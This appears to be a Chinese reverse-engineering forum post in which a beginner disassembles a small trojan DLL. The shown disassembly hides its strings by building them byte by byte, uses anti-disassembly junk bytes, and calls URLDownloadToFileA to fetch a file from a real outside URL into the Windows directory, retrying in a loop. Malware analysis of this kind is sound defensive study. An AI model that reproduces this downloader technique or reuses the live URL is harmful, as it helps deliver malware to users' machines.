.text:10006235 pop edi .text:10006236 pop esi .text:10006237 pop ebx .text:10006238 mov esp, ebp .text:1000623A pop ebp .text:1000623B retn .text:1000623C ; --------------------------------------------------------------------------- .text:1000623C .text:1000623C loc_1000623C: ; CODE XREF: .text:100061A6j .text:1000623C pop edi .text:1000623D mov eax, ebx .text:1000623F pop esi .text:10006240 pop ebx .text:10006241 mov esp, ebp .text:10006243 pop ebp .text:10006244 retn .text:10006244 ; --------------------------------------------------------------------------- .text:10006245 align 10h ///////////////////////////////////////////////////////////////////////// urldownload部分 DWORD __stdcall loc_100011D0(LPVOID) .text:100011D0 loc_100011D0: ; DATA XREF: DllEntryPoint+C3o .text:100011D0 ; Simenze+12o .text:100011D0 push ebp .text:100011D1 mov ebp, esp .text:100011D3 sub esp, 32Ch .text:100011D9 push ebx .text:100011DA push esi .text:100011DB push edi .text:100011DC nop .text:100011DD nop .text:100011DE nop .text:100011DF nop .text:100011E0 nop .text:100011E1 nop .text:100011E2 jb short loc_100011E7 .text:100011E4 jnb short loc_100011E7 .text:100011E4 ; --------------------------------------------------------------------------- .text:100011E6 db 0E8h .text:100011E7 ; --------------------------------------------------------------------------- .text:100011E7 .text:100011E7 loc_100011E7: ; CODE XREF: .text:100011E2j .text:100011E7 ; .text:100011E4j .text:100011E7 mov esi, ds:LoadLibraryA .text:100011ED mov dword ptr [ebp-34h], 1 .text:100011F4 mov bl, 'i' .text:100011F6 .text:100011F6 loc_100011F6: ; CODE XREF: .text:10001427j .text:100011F6 push 9C40h .text:100011FB call _Sleep .text:10001200 mov ecx, 10h .text:10001205 xor eax, eax .text:10001207 lea edi, [ebp-77h] .text:1000120A mov byte ptr [ebp-98h], 'h' .text:10001211 mov byte ptr [ebp-97h], 't' .text:10001218 mov byte ptr [ebp-96h], 't' .text:1000121F mov byte ptr [ebp-95h], 'p' .text:10001226 mov byte ptr [ebp-94h], ':' .text:1000122D mov byte ptr [ebp-93h], '/' .text:10001234 mov byte ptr [ebp-92h], '/' .text:1000123B mov byte ptr [ebp-91h], 'c' .text:10001242 mov byte ptr [ebp-90h], '.' .text:10001249 mov byte ptr [ebp-8Fh], 's' .text:10001250 mov byte ptr [ebp-8Eh], 'h' .text:10001257 mov [ebp-8Dh], bl ; i .text:1000125D mov byte ptr [ebp-8Ch], 'd' .text:10001264 mov byte ptr [ebp-8Bh], 'a' .text:1000126B mov [ebp-8Ah], bl .text:10001271 mov byte ptr [ebp-89h], 'h' .text:10001278 mov byte ptr [ebp-88h], 'u' .text:1000127F mov byte ptr [ebp-87h], 'a' .text:10001286 mov byte ptr [ebp-86h], 'b' .text:1000128D mov [ebp-85h], bl .text:10001293 mov byte ptr [ebp-84h], 'a' .text:1000129A mov byte ptr [ebp-83h], 'n' .text:100012A1 mov byte ptr [ebp-82h], '.' .text:100012A8 mov byte ptr [ebp-81h], 'c' .text:100012AF mov byte ptr [ebp-80h], 'o' .text:100012B3 mov byte ptr [ebp-7Fh], 'm' .text:100012B7 mov byte ptr [ebp-7Eh], '/' .text:100012BB mov byte ptr [ebp-7Dh], 's' .text:100012BF mov byte ptr [ebp-7Ch], '.' .text:100012C3 mov byte ptr [ebp-7Bh], 'g' .text:100012C7 mov [ebp-7Ah], bl .text:100012CA mov byte ptr [ebp-79h], 'f' .text:100012CE mov byte ptr [ebp-78h], 0 ; http://c.shidaihuabian.com/s.gif .text:100012D2 rep stosd .text:100012D4 stosw .text:100012D6 stosb .text:100012D7 mov ecx, 40h .text:100012DC xor eax, eax .text:100012DE lea edi, [ebp-19Bh] .text:100012E4 mov byte ptr [ebp-19Ch], 0 .text:100012EB rep stosd .text:100012ED stosw .text:100012EF add esp, 4 .text:100012F2 mov byte ptr [ebp-1Ch], '\' .text:100012F6 stosb .text:100012F7 mov byte ptr [ebp-1Bh], 't' .text:100012FB mov byte ptr [ebp-1Ah], 'e' .text:100012FF mov byte ptr [ebp-19h], 'm' .text:10001303 mov byte ptr [ebp-18h], 'p' .text:10001307 mov byte ptr [ebp-17h], '\' .text:1000130B mov byte ptr [ebp-16h], 'o' .text:1000130F mov byte ptr [ebp-15h], 'l' .text:10001313 mov byte ptr [ebp-14h], 'm' .text:10001317 mov byte ptr [ebp-13h], '.' .text:1000131B mov [ebp-12h], bl ; i .text:1000131E mov byte ptr [ebp-11h], 'n' .text:10001322 mov [ebp-10h], bl .text:10001325 mov byte ptr [ebp-0Fh], 0 .text:10001329 nop .text:1000132A nop .text:1000132B nop .text:1000132C lea eax, [ebp-0Ch] .text:1000132F mov byte ptr [ebp-0Ch], 'u' .text:10001333 push eax .text:10001334 mov byte ptr [ebp-0Bh], 'r' .text:10001338 mov byte ptr [ebp-0Ah], 'l' .text:1000133C mov byte ptr [ebp-9], 'm' .text:10001340 mov byte ptr [ebp-8], 'o' .text:10001344 mov byte ptr [ebp-7], 'n' .text:10001348 mov byte ptr [ebp-6], '.' .text:1000134C mov byte ptr [ebp-5], 'd' .text:10001350 mov byte ptr [ebp-4], 'l' .text:10001354 mov byte ptr [ebp-3], 'l' .text:10001358 mov byte ptr [ebp-2], 0 .text:1000135C call esi ; loadlibrary 加载urlmon.dll .text:1000135E test eax, eax .text:10001360 jz loc_10001400 .text:10001366 lea ecx, [ebp-30h] .text:10001369 mov byte ptr [ebp-30h], 'U' .text:1000136D push ecx ; urlloadtofile .text:1000136E push eax ; urlmon.dll .text:1000136F mov byte ptr [ebp-2Fh], 'R' .text:10001373 mov byte ptr [ebp-2Eh], 'L' .text:10001377 mov byte ptr [ebp-2Dh], 'D' .text:1000137B mov byte ptr [ebp-2Ch], 'o' .text:1000137F mov byte ptr [ebp-2Bh], 'w' .text:10001383 mov byte ptr [ebp-2Ah], 'n' .text:10001387 mov byte ptr [ebp-29h], 'l' .text:1000138B mov byte ptr [ebp-28h], 'o' .text:1000138F mov byte ptr [ebp-27h], 'a' .text:10001393 mov byte ptr [ebp-26h], 'd' .text:10001397 mov byte ptr [ebp-25h], 'T' .text:1000139B mov byte ptr [ebp-24h], 'o' .text:1000139F mov byte ptr [ebp-23h], 'F' .text:100013A3 mov [ebp-22h], bl ; i .text:100013A6 mov byte ptr [ebp-21h], 'l' .text:100013AA mov byte ptr [ebp-20h], 'e' .text:100013AE mov byte ptr [ebp-1Fh], 'A' .text:100013B2 mov byte ptr [ebp-1Eh], 0 ; urlloadtofile .text:100013B6 call ds:GetProcAddress .text:100013BC lea edx, [ebp-19Ch] .text:100013C2 push 104h .text:100013C7 push edx .text:100013C8 mov _urlloadtofile, eax .text:100013CD call _getwindowsdirectory .text:100013D2 add esp, 8 .text:100013D5 lea eax, [ebp-1Ch] .text:100013D8 lea ecx, [ebp-19Ch] .text:100013DE push eax .text:100013DF push ecx .text:100013E0 call ds:lstrcatA .text:100013E6 push 0 .text:100013E8 lea edx, [ebp-19Ch] ; %system%+filename 储存为本地的文件名称 .text:100013EE push 0 .text:100013F0 lea eax, [ebp-98h] ; http:...url地址 .text:100013F6 push edx .text:100013F7 push eax .text:100013F8 push 0 .text:100013FA call _urlloadtofile .text:10001400 .text:10001400 loc_10001400: ; CODE XREF: .text:10001360j .text:10001400 lea ecx, [ebp-19Ch] .text:10001406 push ecx .text:10001407 call _getfileattributes .text:1000140C add esp, 4 .text:1000140F cmp eax, 0FFFFFFFFh .text:10001412 jnz short loc_1000143B .text:10001414 mov eax, [ebp-34h] .text:10001417 cmp eax, 0Ah .text:1000141A jz loc_100014F6 .text:10001420 inc eax .text:10001421 cmp eax, 1Eh .text:10001424 mov [ebp-34h], eax .text:10001427 jl loc_100011F6 .text:1000142D pop edi .text:1000142E pop esi .text:1000142F mov eax, 1 .text:10001434 pop ebx .text:10001435 mov esp, ebp .text:10001437 pop ebp .text:10001438 retn 4 .text:1000143B ; --------------------------------------------------------------------------- .text:1000143B 上传的附件：复件 12625750.rar （124.22kb，18次下载） 2012-8-26 14:37 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

[旧帖] [原创]菜鸟的一个小木马分析 请大家赐教 0.00雪花

[旧帖] [原创]菜鸟的一个小木马分析请大家赐教 0.00雪花